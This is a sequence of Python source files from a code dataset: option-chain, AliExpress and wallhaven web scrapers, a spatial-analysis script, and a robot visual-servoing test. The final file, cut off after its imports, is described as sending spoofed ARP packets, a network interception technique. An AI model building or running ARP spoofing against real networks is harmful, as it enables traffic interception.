find_poll_em_data(countries)\nfor country in unavailable:\n del countries_with_data[country]\n\nprint(\"Processing the data...\")\nprocessed_data, removed_countries = process_data(countries, raw_data)\nfor country in removed_countries:\n del countries_with_data[country]\n\nprint(\"Performing spatial analysis...\")\nmoran_global = morans_i_global(countries_with_data, processed_data)\ngeary = gearys_c(countries_with_data, processed_data)\nmoran_local = morans_i_local(countries_with_data, processed_data)\n\nprint(\"Plotting the data...\")\nplot(countries, processed_data, mapping=sqrt_mapping)\n\nprint(\"Plotting the results of the spatial analysis...\")\nplt.figure()\nplot(countries, moran_local, add_title=\" (Local Moran's I)\",\n add_info=\"Global Moran's I: \" + str(moran_global) + \"\\nGeary's C: \" + str(geary))\n\nprint(\"Finished.\\n\")\n\npp = PrettyPrinter(indent=4)\nprint(\"============= RESULTS ==============\\n\")\n\nprint(\"These countries had no data available:\", unavailable)\nprint(\"These countries were removed:\", removed_countries)\nprint(\"Global Moran's I: \", moran_global)\nprint(\"Geary's C: \", geary)\nprint(\"Data:\")\npp.pprint(processed_data)\nprint(\"Local Moran's I:\")\npp.pprint(moran_local)\nplt.show()\n","sub_path":"Country Group/country_master.py","file_name":"country_master.py","file_ext":"py","file_size_in_byte":23745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"70945905","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 20 16:42:12 2018\n\n@author: rebeccareitz\n\"\"\"\nfrom lxml import html\nimport requests\nimport pandas as pd\nimport numpy as np\nimport json\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\nfrom langdetect import detect\n\nimport pickle\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\n\nimport os\n\n\ndef scrape_product_info(product_url):\n session_requests = requests.session()\n #login_url = \"https://login.aliexpress.com/\"\n #result = session_requests.get(login_url)\n #tree = html.fromstring(result.text)\n #authenticity_token = tree.xpath(\"//input[@name='_csrf_token']/@value\")\n \n #Load \n #path = 'data/AliExpressSecret.txt' # Path to the file that holds the keys\n #mode = 'r' # read mode--I'll only need to read the username and password from the file\n\n #keys = [] # The list where I'll store my username and password\n #with open(path, mode) as f: # Open the file\n # for line in f:\n # keys.append(line) # The first line is the username, and the second line is the password--add each of these\n # lines to the keys list\n \n #payload = {\n # 'loginID': keys[0].rstrip(),\n # 'password': keys[1].rstrip()\n # }\n #print(product_url)\n \n #login_result = session_requests.post(\n # login_url, \n # data = payload, \n # headers = dict(referer=login_url)\n # )\n \n result = session_requests.get(\n product_url,\n headers = dict(referer = product_url))\n print(result.ok)\n \n soup = BeautifulSoup(result.content, \"html.parser\")\n \n if soup.find('input', {'id': 'hid-product-id'})['value'] is not None:\n product_id = soup.find('input', {'id': 'hid-product-id'})['value']\n else:\n product_id = 1\n title = soup.find('h1', {'class': 'product-name'}).text\n price = float(soup.find('span', {'id': 'j-sku-price'}).text.split('-')[0])\n\n if soup.find('span', {'id': 'j-sku-discount-price'}):\n discount_price = float(soup.find('span', {'id': 'j-sku-discount-price'}).text.split('-')[0])\n else:\n discount_price = None\n\n properties = soup.findAll('li', {'class': 'property-item'})\n attrs_dict = {}\n for item in properties:\n name = item.find('span', {'class': 'propery-title'}).text[:-1]\n val = item.find('span', {'class': 'propery-des'}).text\n attrs_dict[name] = val\n description = json.dumps(attrs_dict)\n\n stars = float(soup.find('span', {'class': 'percent-num'}).text)\n votes = int(soup.find('span', {'itemprop': 'reviewCount'}).text)\n orders = int(soup.find('span', {'id': 'j-order-num'}).text.split()[0].replace(',', ''))\n wishlists = 0 # int(soup.find('span', {'id': 'j-wishlist-num'}).text.strip()[1:-1].split()[0])\n\n try:\n shipping_cost = soup.find('span', {'class': 'logistics-cost'}).text\n shipping_company = soup.find('span', {'id': 'j-shipping-company'}).text\n except Exception:\n shipping_cost = ''\n shipping_company = ''\n is_free_shipping = shipping_cost == 'Free Shipping'\n is_epacket = shipping_company == 'ePacket'\n\n primary_image_url = soup.find('div', {'id': 'magnifier'}).find('img')['src']\n\n store_id = soup.find('span', {'class': 'store-number'}).text.split('.')[-1]\n store_name = soup.find('span', {'class': 'shop-name'}).find('a').text\n store_start_date = soup.find('span', {'class': 'store-time'}).find('em').text\n store_start_date = datetime.strptime(store_start_date, '%b %d, %Y')\n\n if soup.find('span', {'class': 'rank-num'}):\n store_feedback_score = int(soup.find('span', {'class': 'rank-num'}).text)\n store_positive_feedback_rate = float(soup.find('span', {'class': 'positive-percent'}).text[:-1]) * 0.01\n else:\n store_feedback_score = -1\n store_positive_feedback_rate = -1\n\n try:\n cats = [item.text for item in soup.find('div', {'class': 'ui-breadcrumb'}).findAll('a')]\n category = '||'.join(cats)\n except Exception:\n category = ''\n\n row = {\n 'product_id': product_id,\n 'title': title,\n 'description': description,\n 'price': price,\n 'discount_price': discount_price,\n 'stars': stars,\n 'votes': votes,\n 'orders': orders,\n 'wishlists': wishlists,\n 'is_free_shipping': is_free_shipping,\n 'is_epacket': is_epacket,\n 'primary_image_url': primary_image_url,\n 'store_id': store_id,\n 'store_name': store_name,\n 'store_start_date': store_start_date,\n 'store_feedback_score': store_feedback_score,\n 'store_positive_feedback_rate': store_positive_feedback_rate,\n 'category': category,\n 'product_url': product_url\n }\n \n return row\n\ndef get_product_info(product_url):\n dirpath = os.getcwd()\n product_filename = os.path.join(dirpath,'Trust_Express_Site','data', 'all_saved_product_info.csv')\n print(os.listdir())\n print(product_filename)\n product_df = pd.read_csv(product_filename, index_col=False, low_memory=False)\n product_info = product_df.loc[product_df['product_url']==product_url]\n return product_info.iloc[0]\n\ndef find_english(product_reviews):\n lang_list = []\n for ind, row in product_reviews.iterrows():\n this_review = row['buyerfeedback']\n try:\n feedback_lang = detect(this_review)\n lang_dict = {\n 'feedback_lang':feedback_lang,\n 'ind':ind\n }\n except:\n continue\n lang_list.append(lang_dict)\n lang_df = pd.DataFrame(lang_list)\n product_reviews = product_reviews.join(lang_df.set_index('ind'))\n english_product_reviews = product_reviews.loc[product_reviews['feedback_lang']=='en']\n return english_product_reviews\n\ndef standardize_text(df, text_field):\n df[text_field] = df[text_field].str.replace(r\"http\\S+\", \"\")\n df[text_field] = df[text_field].str.replace(r\"http\", \"\")\n df[text_field] = df[text_field].str.replace(r\"@\\S+\", \"\")\n df[text_field] = df[text_field].str.replace(r\"[^A-Za-z0-9(),!?@\\'\\`\\\"\\_\\n]\", \" \")\n df[text_field] = df[text_field].str.replace(r\"@\", \"at\")\n df[text_field] = df[text_field].str.lower()\n return df\n\ndef find_helpful(english_product_reviews):\n \n english_product_reviews = standardize_text(english_product_reviews, 'buyerfeedback')\n \n dirpath = os.getcwd()\n tfidf_vectorizer_pkl_filename = os.path.join(dirpath,'Trust_Express_Site','models', 'count_vectorizer.pickle')\n tfidf_vectorizer_pkl = open(tfidf_vectorizer_pkl_filename, 'rb')\n tfidf_vectorizer = pickle.load(tfidf_vectorizer_pkl)\n X_tfidf = tfidf_vectorizer.transform(english_product_reviews['buyerfeedback'])\n \n clf_tfidf_pkl_filename = os.path.join(dirpath,'Trust_Express_Site','models', 'clf_SGD.pickle')\n clf_tfidf_pkl = open(clf_tfidf_pkl_filename, 'rb')\n clf_tfidf = pickle.load(clf_tfidf_pkl)\n y = clf_tfidf.predict_proba(X_tfidf)\n y_df = pd.DataFrame(y, columns = ['unhelp_prob','help_prob'], index = english_product_reviews.index.values) \n \n english_reviews_with_prob = pd.concat([english_product_reviews[:],y_df[:]],axis = 1)\n \n return english_reviews_with_prob\n\ndef extract_product_reviews(product_id, max_page=100):\n url_template = 'https://m.aliexpress.com/ajaxapi/EvaluationSearchAjax.do?type=all&index={}&pageSize=20&productId={}&country=US'\n initial_url = url_template.format(1, product_id)\n print(product_id)\n reviews = []\n\n s = requests.Session()\n\n resp = s.get(initial_url)\n if resp.status_code == 200:\n data = resp.json()\n total_page = data['totalPage']\n total_page = min([total_page, max_page])\n reviews += data['evaViewList']\n\n if total_page > 1:\n next_page = 2\n while next_page <= total_page:\n print('{}\\t{}/{}'.format(product_id, next_page, total_page))\n next_url = url_template.format(next_page, product_id)\n resp = s.get(next_url)\n\n next_page += 1\n\n try:\n data = resp.json()\n except Exception:\n continue\n\n reviews += data['evaViewList']\n\n filtered_reviews = []\n for review in reviews:\n data = {\n 'product_id': product_id,\n 'anonymous': review['anonymous'],\n 'buyercountry': review['buyerCountry'],\n 'buyereval': review['buyerEval'],\n 'buyerfeedback': review['buyerFeedback'],\n 'buyergender': review['buyerGender'] if 'buyerGender' in review else '',\n 'buyerHeadPortrait': review['buyerHeadPortrait'] if 'buyerHeadPortrait' in review else '',\n 'buyerid': review['buyerId'] if 'buyerId' in review else '',\n 'buyername': review['buyerName'] if 'buyerName' in review else '',\n 'evaldate': review['evalDate'],\n 'image': review['images'][0] if 'images' in review and len(review['images']) > 0 else '',\n 'logistics': review['logistics'] if 'logistics' in review else '',\n 'skuInfo': review['skuInfo'] if 'skuInfo' in review else '',\n 'thumbnail': review['thumbnails'][0] if 'thumbnails' in review and len(review['thumbnails']) > 0 else '',\n }\n filtered_reviews.append(data)\n\n product_reviews = pd.DataFrame(filtered_reviews)\n print(product_reviews.shape)\n english_product_reviews = find_english(product_reviews)\n print(english_product_reviews.shape)\n english_product_reviews_with_prob = find_helpful(english_product_reviews)\n print(english_product_reviews_with_prob.shape)\n return english_product_reviews_with_prob\n\ndef get_product_reviews(product_info):\n product_id = product_info['product_id']\n dirpath = os.getcwd()\n reviews_filename = os.path.join(dirpath,'Trust_Express_Site','data', 'smaller_pretrained_aliexpress_reviews.csv')\n review_df = pd.read_csv(reviews_filename, index_col=False, low_memory=False)\n product_reviews = review_df.loc[pd.to_numeric(review_df['product_id'], errors = 'coerce')==product_id]\n return product_reviews\n\ndef rate_my_product(product_reviews):\n number_reviews = product_reviews['buyerid'].count()\n helpful_only = product_reviews.loc[product_reviews['help_prob']>.5]\n number_helpful= helpful_only['buyerid'].count()\n helpful_only_rating = pd.to_numeric(helpful_only['buyereval']).mean()/20\n product_ratings = {\n 'number_english':number_reviews,\n 'number_helpful':number_helpful,\n 'helpful_only_rating':helpful_only_rating,\n }\n return product_ratings\n\ndef get_top_reviews(product_reviews):\n helpful_sorted = product_reviews.sort_values(by='help_prob',ascending=False)\n helpful_sorted['buyereval']=pd.to_numeric(helpful_sorted['buyereval'], errors='coerce')\n top_reviews_list = []\n top_review_1 = {\n 'buyerfeedback' : helpful_sorted.iloc[0]['buyerfeedback'],\n 'help_prob':helpful_sorted.iloc[0]['help_prob']*100,\n 'buyereval':helpful_sorted.iloc[0]['buyereval']\n }\n top_reviews_list.append(top_review_1)\n top_review_2 = {\n 'buyerfeedback' : helpful_sorted.iloc[1]['buyerfeedback'],\n 'help_prob':helpful_sorted.iloc[1]['help_prob']*100,\n 'buyereval':helpful_sorted.iloc[1]['buyereval']\n }\n top_reviews_list.append(top_review_2)\n \n if helpful_sorted.buyereval.min() < 60:\n negative_reviews = helpful_sorted.loc[helpful_sorted['buyereval']<60]\n else:\n negative_reviews = helpful_sorted.loc[helpful_sorted['buyereval']==helpful_sorted.buyereval.min()]\n \n negative_review_1 = {\n 'buyerfeedback' : negative_reviews.iloc[0]['buyerfeedback'],\n 'help_prob':negative_reviews.iloc[0]['help_prob']*100,\n 'buyereval':negative_reviews.iloc[0]['buyereval']\n }\n top_reviews_list.append(negative_review_1)\n \n top_reviews = pd.DataFrame(top_reviews_list)\n \n return top_reviews\n\nif __name__ == '__main__':\n # Test the functions\n link = 'https://www.aliexpress.com/item/100pcs-bag-10mm-wholesale-silver-Plating-metal-Jump-Rings-Loop-Finding/1082836270.html?ws_ab_test=searchweb0_0,searchweb201602_3_10065_10068_10130_10547_10546_10059_10548_315_10545_10696_100031_5017615_531_10084_10083_10103_451_10618_452_10307_5017715,searchweb201603_55,ppcSwitch_3&algo_expid=89c3c219-2c61-4ec5-a633-13e752a31ec8-41&algo_pvid=89c3c219-2c61-4ec5-a633-13e752a31ec8&transAbTest=ae803_2&priceBeautifyAB=0'\n product_info = get_product_info(link)\n print(product_info['product_id'])\n product_reviews = get_product_reviews(product_info)\n print(product_reviews.iloc[0]['buyerid'])\n product_ratings=rate_my_product(product_reviews)\n print(product_ratings)\n \n link_2 = 'https://www.aliexpress.com/store/product/2017-Women-Summer-Casual-Cotton-Linen-V-neck-short-sleeve-tops-shorts-two-piece-set-Female/2056007_32808779921.html?spm=2114.search0103.3.56.503d1b09JWn3Kc&ws_ab_test=searchweb0_0,searchweb201602_5_10065_10068_10130_10547_10546_10059_10884_10548_315_10545_10887_10696_100031_10084_531_10083_10103_10618_10307_449,searchweb201603_60,ppcSwitch_7&algo_expid=69625d3c-df51-43ba-8dbf-232180987a7d-7&algo_pvid=69625d3c-df51-43ba-8dbf-232180987a7d&priceBeautifyAB=0'\n product_info = scrape_product_info(link_2)\n print(product_info['product_id'])\n product_reviews = extract_product_reviews(product_info['product_id'])\n print(product_reviews.iloc[0]['buyerid'])\n \n ","sub_path":"flaskapp/Trust_Express_Site/trust_utils_4.py","file_name":"trust_utils_4.py","file_ext":"py","file_size_in_byte":13676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"623610618","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport numpy.linalg as LA\nimport math\nfrom math import sin, cos\nfrom util_visual_servoing import get_train_test_scenes, get_mapper, detect_correspondences, get_mapper_scene2points, create_folder, get_mapper_dist_theta_heading, get_pose_from_name, sample_gt_correspondences_with_large_displacement, build_L_matrix, compute_velocity_through_correspondences_and_depth, goToPose_one_step\nimport glob\nimport sys\nimport os, inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(os.path.dirname(currentdir))\nos.sys.path.insert(0,parentdir)\nsys.path.append('/home/reza/Datasets/GibsonEnv/my_code/rrt')\nsys.path.append('/home/reza/Datasets/GibsonEnv/my_code/CVPR_workshop')\nimport rrt\nimport random\nfrom math import cos, sin, pi\nfrom util import action2pose, func_pose2posAndorn, similar_location_under_certainThreshold, plus_theta_fn, minus_theta_fn\n\nnp.set_printoptions(precision=2, suppress=True)\nperception_rep = 'gtSparse' # 'gtDense', 'learnedSparse', 'sift'\ndepth_method = 'gt' # 'estimated', 'void'\n\ndef main(scene_idx=0):\n\n\t#scene_idx = 0\n\n\tmapper_scene2z = get_mapper()\n\tmapper_scene2points = get_mapper_scene2points()\n\tTrain_Scenes, Test_Scenes = get_train_test_scenes()\n\tscene_name = Test_Scenes[scene_idx]\n\tnum_startPoints = len(mapper_scene2points[scene_name])\n\tnum_steps = 35\n\n\t## create test folder\n\ttest_folder = '/home/reza/Datasets/GibsonEnv/my_code/visual_servoing/test_IBVS'\n\t#approach_folder = '{}/gtCorrespondence_interMatrix_gtDepth_Vz_OmegaY'.format(test_folder)\n\t#create_folder(approach_folder)\n\n\t#scene_folder = '{}/{}'.format(approach_folder, scene_name)\n\t#create_folder(scene_folder)\n\n\tf = open('{}/{}_{}.txt'.format(test_folder, perception_rep, depth_method), 'a')\n\tf.write('scene_name = {}\\n'.format(scene_name))\n\tlist_count_correct = []\n\tlist_count_runs = []\n\tlist_count_steps = []\n\n\t## rrt functions\n\t## first figure out how to sample points from rrt graph\n\trrt_directory = '/home/reza/Datasets/GibsonEnv/gibson/assets/dataset/{}_for_rrt'.format(scene_name)\n\tpath_finder = rrt.PathFinder(rrt_directory)\n\tpath_finder.load()\n\tnum_nodes = len(path_finder.nodes_x)\n\tfree = cv2.imread('/home/reza/Datasets/GibsonEnv/gibson/assets/dataset/{}_for_rrt/free.png'.format(scene_name), 0)\n\n\t## GibsonEnv setup\n\t## For Gibson Env\n\timport gym, logging\n\tfrom mpi4py import MPI\n\tfrom gibson.envs.husky_env import HuskyNavigateEnv\n\tfrom baselines import logger\n\timport skimage.io\n\tfrom transforms3d.euler import euler2quat\n\tconfig_file = os.path.join('/home/reza/Datasets/GibsonEnv/my_code/CVPR_workshop', 'env_yamls', '{}_navigate.yaml'.format(scene_name))\n\tenv = HuskyNavigateEnv(config=config_file, gpu_count = 1)\n\tobs = env.reset() ## this line is important otherwise there will be an error like 'AttributeError: 'HuskyNavigateEnv' object has no attribute 'potential''\n\n\tdef get_obs(current_pose):\n\t\tpos, orn = func_pose2posAndorn(current_pose, mapper_scene2z[scene_name])\n\t\tenv.robot.reset_new_pose(pos, orn)\n\t\tobs, _, _, _ = env.step(4)\n\t\tobs_rgb = obs['rgb_filled']\n\t\tobs_depth = obs['depth']\n\t\treturn obs_rgb.copy(), obs_depth.copy()\n\n\tbase_folder = '/home/reza/Datasets/GibsonEnv/my_code/visual_servoing/sample_image_pairs_{}'.format('test')\n\n\n\n\t## go through each point folder\n\tfor point_idx in range(0, num_startPoints):\n\t#for point_idx in range(0, 1):\n\t\tprint('point_idx = {}'.format(point_idx))\n\n\t\t#point_folder = '{}/point_{}'.format(scene_folder, point_idx)\n\t\t#create_folder(point_folder)\n\n\t\t## read in start img and start pose\n\t\tpoint_image_folder = '{}/{}/point_{}'.format(base_folder, scene_name, point_idx)\n\t\tpoint_pose_npy_file = np.load('{}/{}/point_{}_poses.npy'.format(base_folder, scene_name, point_idx))\n\n\t\tstart_img = cv2.imread('{}/{}.png'.format(point_image_folder, point_pose_npy_file[0]['img_name']))[:, :, ::-1]\n\t\tstart_pose = point_pose_npy_file[0]['pose']\n\n\t\t## index 0 is the left image, so right_img_idx starts from index 1\n\t\tcount_correct = 0\n\t\tlist_correct_img_names = []\n\t\tlist_whole_stat = []\n\t\tlist_steps = []\n\n\t\tfor right_img_idx in range(1, len(point_pose_npy_file)):\n\t\t#for right_img_idx in range(10, 11):\n\t\t\tflag_correct = False\n\t\t\tprint('right_img_idx = {}'.format(right_img_idx))\n\n\t\t\tcount_steps = 0\n\n\t\t\tcurrent_pose = start_pose\n\t\t\t\n\t\t\tright_img_name = point_pose_npy_file[right_img_idx]['img_name']\n\t\t\tgoal_pose = point_pose_npy_file[right_img_idx]['pose']\n\t\t\tgoal_img, goal_depth = get_obs(goal_pose)\n\n\t\t\tlist_result_poses = [current_pose]\n\t\t\tnum_matches = 0\n\t\t\tflag_broken = False\n\t\t\twhile count_steps < num_steps:\n\t\t\t\tcurrent_img, current_depth = get_obs(current_pose)\n\t\t\t\ttry:\n\t\t\t\t\tkp1, kp2 = sample_gt_correspondences_with_large_displacement(current_depth, goal_depth, current_pose, goal_pose)\n\t\t\t\t\tif count_steps == 0:\n\t\t\t\t\t\tstart_depth = current_depth.copy()\n\t\t\t\texcept:\n\t\t\t\t\tprint('run into error')\n\t\t\t\t\tbreak\n\t\t\t\tnum_matches = kp1.shape[1]\n\n\t\t\t\tvx, vz, omegay, flag_stop = compute_velocity_through_correspondences_and_depth(kp1, kp2, current_depth)\n\n\t\t\t\tprevious_pose = current_pose\n\t\t\t\tcurrent_pose, _, _, flag_stop_goToPose = goToPose_one_step(current_pose, vx, vz, omegay)\n\n\t\t\t\t## check if there is collision during the action\n\t\t\t\tleft_pixel = path_finder.point_to_pixel((previous_pose[0], previous_pose[1]))\n\t\t\t\tright_pixel = path_finder.point_to_pixel((current_pose[0], current_pose[1]))\n\t\t\t\t# rrt.line_check returns True when there is no obstacle\n\t\t\t\tif not rrt.line_check(left_pixel, right_pixel, free):\n\t\t\t\t\tflag_broken = True\n\t\t\t\t\t#print('run into an obstacle ...')\n\t\t\t\t\tbreak\n\n\t\t\t\t## check if we should stop or not\n\t\t\t\tif flag_stop or flag_stop_goToPose:\n\t\t\t\t\t#print('flag_stop = {}, flag_stop_goToPose = {}'.format(flag_stop, flag_stop_goToPose))\n\t\t\t\t\t#print('break')\n\t\t\t\t\tbreak\n\n\t\t\t\tcount_steps += 1\n\t\t\t\tlist_result_poses.append(current_pose)\n\t\t\t\t## sample current_img again to save in list_obs\n\t\t\t\tcurrent_img, current_depth = get_obs(current_pose)\n\t\t\t#assert 1==2\n\t\t\t## decide if this run is successful or not\n\t\t\tflag_correct, dist, theta_change = similar_location_under_certainThreshold(goal_pose, list_result_poses[count_steps])\n\t\t\t#print('dist = {}, theta = {}'.format(dist, theta_change))\n\t\t\t#print('start_pose = {}, final_pose = {}, goal_pose = {}'.format(start_pose, list_result_poses[-1], goal_pose))\n\t\t\tif flag_correct:\n\t\t\t\tcount_correct += 1\n\t\t\t\tlist_correct_img_names.append(right_img_name[10:])\n\n\t\t\tif flag_correct: \n\t\t\t\tstr_succ = 'Success'\n\t\t\t\tprint('str_succ = {}'.format(str_succ))\n\t\t\telse:\n\t\t\t\tstr_succ = 'Failure'\n\t\t\t\tprint('str_succ = {}'.format(str_succ))\n\n\t\t\tlist_steps.append(len(list_result_poses))\n\t\t\t## ===================================================================================================================\n\t\t\t## plot the pose graph\n\t\t\t'''\n\t\t\timg_name = 'goTo_{}.jpg'.format(right_img_name[10:])\n\t\t\tprint('img_name = {}'.format(img_name))\n\n\t\t\t## plot the poses\n\t\t\tfree2 = cv2.imread('/home/reza/Datasets/GibsonEnv/gibson/assets/dataset/{}_for_rrt/free.png'.format(scene_name), 1)\n\t\t\trows, cols, _ = free2.shape\n\t\t\tplt.imshow(free2)\n\n\t\t\tfor m in range(len(list_result_poses)):\n\t\t\t\tpose = list_result_poses[m]\n\t\t\t\tx, y = path_finder.point_to_pixel((pose[0], pose[1]))\n\t\t\t\ttheta = pose[2]\n\t\t\t\tplt.arrow(x, y, cos(theta), sin(theta), color='y', \\\n\t\t\t\t\toverhang=1, head_width=0.1, head_length=0.15, width=0.001)\n\t\t\t## draw goal pose\n\t\t\tx, y = path_finder.point_to_pixel((goal_pose[0], goal_pose[1]))\n\t\t\ttheta = goal_pose[2]\n\t\t\tplt.arrow(x, y, cos(theta), sin(theta), color='r', \\\n\t\t\t\t\toverhang=1, head_width=0.1, head_length=0.15, width=0.001)\n\n\t\t\tplt.axis([0, cols, 0, rows])\n\t\t\tplt.xticks([])\n\t\t\tplt.yticks([])\n\t\t\tplt.title('{}, start point_{}, goal viewpoint {}, {}\\n dist = {:.4f} meter, theta = {:.4f} degree\\n'.format(scene_name, point_idx, right_img_name[10:], str_succ, dist, theta_change))\n\t\t\tplt.savefig('{}/{}'.format(point_folder, img_name), bbox_inches='tight', dpi=(400))\n\t\t\tplt.close()\n\n\t\t\t## ======================================================================================================================\n\t\t\t## save stats\n\t\t\tcurrent_test_dict = {}\n\t\t\tcurrent_test_dict['img_name'] = right_img_name\n\t\t\tcurrent_test_dict['success_flag'] = flag_correct\n\t\t\tcurrent_test_dict['dist'] = dist\n\t\t\tcurrent_test_dict['theta'] = theta_change\n\t\t\tcurrent_test_dict['steps'] = count_steps\n\t\t\tcurrent_test_dict['collision'] = flag_broken\n\n\t\t\tlist_whole_stat.append(current_test_dict)\n\t\t\t'''\n\n\t\t'''\n\t\tnp.save('{}/runs_statistics.npy'.format(point_folder), list_whole_stat)\n\n\t\tsuccess_rate = 1.0 * count_correct / (len(point_pose_npy_file)-1)\n\t\tprint('count_correct/num_right_images = {}/{} = {}'.format(count_correct, len(point_pose_npy_file)-1, success_rate))\n\n\t\t## write correctly run target image names to file\n\t\tf = open('{}/successful_runs.txt'.format(point_folder), 'w')\n\t\tf.write('count_correct/num_right_images = {}/{} = {}\\n'.format(count_correct, len(point_pose_npy_file)-1, success_rate))\n\t\tfor i in range(len(list_correct_img_names)):\n\t\t\tf.write('{}\\n'.format(list_correct_img_names[i]))\n\t\tf.close()\n\t\tprint('writing correct run image names to txt ...')\n\t\t'''\n\t\tavg_steps = 1.0 * sum(list_steps) / len(list_steps)\n\t\tf.write('point {} : {}/{}, {}\\n'.format(point_idx, count_correct, len(point_pose_npy_file)-1, avg_steps))\n\t\tlist_count_correct.append(count_correct)\n\t\tlist_count_runs.append(len(point_pose_npy_file)-1)\n\t\tlist_count_steps.append(avg_steps)\n\t\tf.flush()\n\n\tavg_count_steps = 1.0 * sum(list_count_steps) / len(list_count_steps)\n\tf.write('In total : {}/{}, {}\\n'.format(sum(list_count_correct), sum(list_count_runs), avg_count_steps))\n\tf.write('-------------------------------------------------------------------------------------\\n')\t\n\n#'''\nif __name__ == \"__main__\":\t\n\timport argparse\n\tparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--scene_idx', type=int, default=0)\n\targs = parser.parse_args()\n\tmain(args.scene_idx)\n#'''","sub_path":"visual_servoing/test_IBVS_gtCorrespondence_interMatrix_gtDepth_Vz_OmegaY.py","file_name":"test_IBVS_gtCorrespondence_interMatrix_gtDepth_Vz_OmegaY.py","file_ext":"py","file_size_in_byte":9956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"90122333","text":"\ndef marketwatchOptionChain(ticker):\n\turl = 'https://www.marketwatch.com/investing/stock/{}/options?countrycode=US&showAll=True'.format(ticker.lower())\n\timport requests\n\tfrom bs4 import BeautifulSoup\n\n\tdata = requests.get(url).text\n\thtml = BeautifulSoup(data, 'lxml')\n\tchain = html.find('table', class_='optiontable eightwide')\n\n\tcalls, puts = [], []\n\toptiontable = chain.find_all('tr')\n\theaderExists, currentExpiry, colnHeaders = False, None, None\n\n\tfor row in optiontable:\n\t\tcols = row.find_all('td')\n\t\tcols = [elem.text.strip() for elem in cols]\n\t\texcludeEmpty = [elem for elem in cols if elem] # Get rid of empty values\n\n\t\tif \"Symbol\" in excludeEmpty[0]:\n\t\t\tif (not headerExists):\n\t\t\t\tcolnHeaders = [elem for elem in excludeEmpty if elem != \"Symbol\"]\n\t\t\t\tcolnHeaders = colnHeaders[0:6]\n\t\t\t\tcolnHeaders.insert(0, \"Expiry\")\n\t\t\t\tcolnHeaders.insert(1, \"Strike\")\n\t\t\t\theaderExists = True\n\n\t\tif \"Expires\" in excludeEmpty[0]:\n\t\t\tcurrentExpiry = excludeEmpty[0][7:].strip()\n\t\telif \"quote\" in excludeEmpty[0]:\n\t\t\texcludeQuote = [elem for elem in excludeEmpty if elem != \"quote\"]\n\t\t\tdata = (currentExpiry, *excludeQuote)\n\t\t\tcalls.append((data[0], data[7], *data[1:7]))\n\t\t\tputs.append((data[0], data[7], *data[8:]))\n\n\timport pandas as pd\n\tcallsDF = pd.DataFrame(calls, columns=colnHeaders)\n\tputsDF = pd.DataFrame(puts, columns=colnHeaders)\n\treturn callsDF, putsDF\n","sub_path":"Algotrading/Arrow/DelayedOptionsChain.py","file_name":"DelayedOptionsChain.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"372699035","text":"import os\n\nimport matplotlib.pyplot as plt\nimport pandas\nimport requests\nimport requests.exceptions\nfrom bs4 import BeautifulSoup\n\n\ndef get_image_ids():\n \"\"\"\n 取得同级目录下所有图片的 id\n :return: image_ids\n \"\"\"\n image_ids = []\n for file_name in os.listdir('./'):\n try:\n image_id_str = file_name.split('-')[1].split('.')[0]\n image_id = int(image_id_str)\n image_ids.append(image_id)\n except IndexError:\n continue\n except ValueError:\n continue\n image_ids.sort()\n return image_ids\n\n\ndef get_image_detail_urls(image_ids):\n \"\"\"\n 取得图片详情 url\n :param image_ids: image_ids\n :return: image_detail_urls\n \"\"\"\n image_detail_url_tmp = 'https://alpha.wallhaven.cc/wallpaper/{0}'\n image_detail_urls = []\n for image_id in image_ids:\n image_detail_url = image_detail_url_tmp.format(image_id)\n image_detail_urls.append(image_detail_url)\n print('image_detail_urls.append {0}'.format(image_detail_url))\n return image_detail_urls\n\n\ndef get_image_tag_list(image_url):\n \"\"\"\n 取得图片标签列表\n :param image_url: image_url\n :return: tag_list\n \"\"\"\n print('GET {0}'.format(image_url))\n response = requests.get(image_url, timeout=10)\n soup = BeautifulSoup(response.text, 'html.parser')\n img_tag = soup.find('img', id='wallpaper')\n tag_list = img_tag['alt'].split(' ')[2:]\n return tag_list\n\n\ndef get_image_tag_dict(image_urls):\n \"\"\"\n 获取图片标签字典\n :param image_urls: image_urls\n :return: image_tag_dict\n \"\"\"\n tag_dict = dict()\n for image_url in image_urls:\n try:\n image_tag_list = get_image_tag_list(image_url)\n except requests.exceptions.ReadTimeout:\n continue\n except TypeError:\n continue\n for image_tag in image_tag_list:\n data = tag_dict.get(image_tag, 0)\n data += 1\n tag_dict[image_tag] = data\n return tag_dict\n\n\ndef get_sorted_data_frame(tag_dict):\n \"\"\"\n 返回排序后的 DataFrame\n :param tag_dict:\n :return:\n \"\"\"\n tag_data_list = [tag_dict]\n df = pandas.DataFrame(tag_data_list, columns=['Tag', 'Count'])\n df.sort_values('Count', ascending=False, inplace=True)\n return df\n\n\ndef save_data_image_top20(data, labels):\n \"\"\"\n 生成标签数据 top 20 饼图\n :param data: 数据\n :param labels: 标签名\n \"\"\"\n plt.pie(data, labels=labels)\n plt.savefig('tag-top-20.png')\n print('top 20 饼图生成完毕')\n\n\nif __name__ == '__main__':\n image_ids = get_image_ids()\n print('共检测到 {0} 张图片'.format(len(image_ids)))\n image_detail_urls = get_image_detail_urls(image_ids)\n tag_dict = get_image_tag_dict(image_detail_urls)\n data_frame = get_sorted_data_frame(tag_dict)\n data_frame.to_csv('tag_data.csv')\n save_data_image_top20([data for data in data_frame['Count']][:20], [tag for tag in data_frame['Tag']][:20])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"251764953","text":"\"\"\"\nBased on ARP packets received, sends out spoofed ARP packets.\n\n\"\"\"\nfrom host_state import HostState\nimport scapy.all as sc\nimport threading\nimport utils\nimport time\n\n\n# 